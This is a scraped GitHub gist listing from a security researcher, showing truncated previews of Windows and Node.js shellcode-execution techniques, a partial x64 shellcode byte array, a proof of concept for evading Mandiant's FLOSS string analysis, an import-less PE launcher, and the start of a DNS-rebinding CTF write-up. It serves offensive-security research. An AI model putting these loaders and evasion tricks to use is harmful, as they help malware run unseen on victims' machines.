Helping to make open source a tad bit more secure
@whokilleddb
whokilleddb / Program.cs
Created October 29, 2025 22:44 — forked from susMdT/Program.cs
haha funny jit go brrrr
using System;
using System.Runtime.CompilerServices;
using System.Reflection;
using System.Reflection.Emit;
namespace FunkyJit
{
class Program
{
public static void Nothing() { Console.WriteLine(); }
static void Main(string[] args)
@whokilleddb
whokilleddb / Program.cs
Created October 29, 2025 22:27
CLR uses an executable heap - so why shouldn't we?
using System;
using System.Runtime.InteropServices;
namespace ExecutableHeapInfo
{
class Program
{
// Import GetProcessExecutableHeap from mscoreei.dll
[DllImport("mscoreei.dll", SetLastError = true)]
private static extern IntPtr GetProcessExecutableHeap();
@whokilleddb
whokilleddb / JasonToddIsTheBestRobin.c
Created August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@whokilleddb
whokilleddb / LowNtReadFile.c
Created August 12, 2025 21:19
Read contents of a file using LowNtReadFile
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ntdll.lib")
#define FILE_TO_READ L"\\??\\C:\\Users\\DB\\Desktop\\test.txt"
EXTERN_C NTSTATUS NtOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions);
@whokilleddb
whokilleddb / enclave.c
Created August 3, 2025 21:35
Run shellcode using LdrCallEnclave
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
@whokilleddb
whokilleddb / main.cc
Created July 25, 2025 18:18
Run code before main()
#include <stdio.h>
#ifdef _MSC_VER
#ifdef __cplusplus
#define CONSTRUCTOR_FUNC(func) \
struct func##_constructor { \
func##_constructor() { func(); } \
}; \
@whokilleddb
whokilleddb / main.c
Created July 24, 2025 17:53
PoC code to bypass flare/floss by mandiant
/*
main.c - Demonstrate how easy it is to bypass flare-floss with a single line
Compile with:
x86_64-w64-mingw32-gcc main.c -o main.exe -masm=intel
*/
#include <windows.h>
#include <stdio.h>
@whokilleddb
whokilleddb / shellcode.js
Created October 11, 2023 11:16
NodeJS FFI to run shellcode!
const ffi = require('ffi-napi');
const ref = require("ref-napi");
const SIZE_T = ref.types.uint64;
const DWORD = ref.types.uint32;
const VOID = ref.types.void;
const LPVOID = ref.refType(VOID);
const HANDLE = LPVOID;
const LPDWORD = ref.refType(DWORD);
@whokilleddb
whokilleddb / launcher.c
Last active August 3, 2025 22:03
PE without any imports!
// Compile with: cl.exe /Ox /W0 /GS- launcher.c
// Check imports with: dumpbin /imports launcher.exe
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(linker, "/entry:WinMain")
// Function Pointers
@whokilleddb
whokilleddb / Solution_08_12.md
Created December 8, 2022 16:20
Intigriti Spot The Bug Solution 08/12

The given code snippet is vulnerable to a DNS rebinding attack, in which an attacker switches the IP addresses associated with a domain name to pass certain security checks!

To understand this challenge, let's look at the source code:

First things first, there are two files:

  • app.js: Our friendly vulnerable application
  • local.js: A simple server which gives us our flag!